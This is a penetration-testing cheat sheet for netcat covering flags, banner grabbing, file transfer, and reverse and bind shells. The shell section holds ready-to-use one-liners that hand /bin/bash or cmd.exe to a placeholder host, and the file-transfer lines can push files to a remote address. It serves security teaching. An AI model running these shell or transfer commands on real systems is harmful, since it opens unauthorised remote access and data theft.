Netcat Cheat Sheet

January 23, 2021 | by Stefano Lanaro
Introduction
Netcat is a networking tool used to send and receive data over a TCP/UDP network connection. It is often referred to as the networking Swiss army knife, as it can be used to carry out a wide variety of tasks.
In penetration testing, Netcat is often used to establish a reverse/bind shell with a target machine, transfer files over a network, or interact with certain services such as FTP or SMTP.
Netcat Flags
The tool has a number of flags that can be used; these are the main ones:
Flag  Description
-v    Provide verbose output.
-n    Do not resolve hostnames (no DNS lookups) when establishing a connection.
-l    Listen for incoming connections.
-p    Specify the port to communicate with or to listen on.
-e    Specify a binary to execute when the connection is established. This has been removed in newer versions of Netcat.
-c    Specify a command to execute when the connection is established. This has been removed in newer versions of Netcat.
-w    Specify a timeout period in seconds, after which the connection is closed if it is still idle.
-z    Perform a port scan against a given host and port or port range, without sending any data.
-i    Specify a delay interval between lines of text sent and received.
-x    Connect to a target through a proxy. If the proxy port is not specified, the well-known port for the proxy protocol is used.
-X    Specify the proxy protocol to be used. The options are "4" (SOCKS 4), "5" (SOCKS 5) and "connect" (HTTPS). If not specified, SOCKS 5 is used.
Banner Grabbing
Services often display a banner when a connection is established. Banner grabbing uses this to gather information about a service and its version.
This can be performed by establishing a simple connection to the service.
Examples:
Command                              Description
nc -nv IP_ADDRESS/URL 80             HTTP banner grabbing (drop -n when giving a hostname, since -n disables name resolution)
nc -nv IP_ADDRESS 25/2525/465/587    SMTP banner grabbing
nc -nv IP_ADDRESS 110/995            POP3 banner grabbing
nc -nv IP_ADDRESS 143/993            IMAP banner grabbing
nc -nv IP_ADDRESS 21                 FTP banner grabbing
nc -nv IP_ADDRESS 23                 Telnet banner grabbing
nc -nv IP_ADDRESS 139/445            SMB/Samba banner grabbing
File Transfers
Netcat can also be used to transfer files over a network between machines.
Examples:
Command                              Description
nc -lvnp 443 > file.txt              Listen for incoming connections on port 443 and redirect received output to a file named "file.txt". Used on the receiving machine.
nc -nv IP_ADDRESS 443 < file.txt     Send the content of "file.txt" to the specified IP address on port 443. Used on the sending machine.
cat file.txt | nc IP_ADDRESS 443     Alternative to the above.
Reverse/Bind Shells
In penetration testing, Netcat is often used to establish a reverse or bind shell with a target machine and thereby gain remote access to it.
Reverse Shells
In a reverse shell, the attacker host listens for incoming connections and the target machine connects to it. This method is normally preferred, as it is less likely to be blocked by firewall or antivirus software: these normally lock down incoming connections but not outgoing ones.
Examples:
Command                                Description
nc -lvnp 443                           Listen for an incoming connection on port 443. Used on the attacker machine.
nc -nv -e /bin/bash IP_ADDRESS 443     Connect to the given IP address on port 443 and execute the bash shell over the connection. Used on the victim machine.
nc -nv -e cmd.exe IP_ADDRESS 443       Same as above, for Windows.
nc -nv -c /bin/bash IP_ADDRESS 443     Connect to the given IP address on port 443 and execute the /bin/bash command over the connection. Used on the victim machine.
nc -nv -c cmd.exe IP_ADDRESS 443       Same as above, for Windows.
Bind Shells
In a bind shell, the victim host listens for incoming connections and the attacker machine connects to it. Although this method is more likely to fail, it is often used in public exploits because it does not require an IP address to be specified, so the exploit can be reused without regenerating it for a different local IP address.
Examples:
Command                                Description
nc -lvnp 443 -e /bin/bash              Listen for an incoming connection on port 443 and execute the bash shell when a connection is received. Used on the victim machine.
nc -lvnp 443 -e cmd.exe                Same as above, for Windows.
nc -lvnp 443 -c /bin/bash              Listen for an incoming connection on port 443 and execute the /bin/bash command when a connection is received. Used on the victim machine.
nc -lvnp 443 -c cmd.exe                Same as above, for Windows.
Conclusion
Netcat is a very powerful tool, and knowing it well is indispensable when performing penetration tests, as it allows many network operations to be carried out with very little effort.
It comes pre-installed with most Linux distributions and there is a Windows executable available that can be used as well.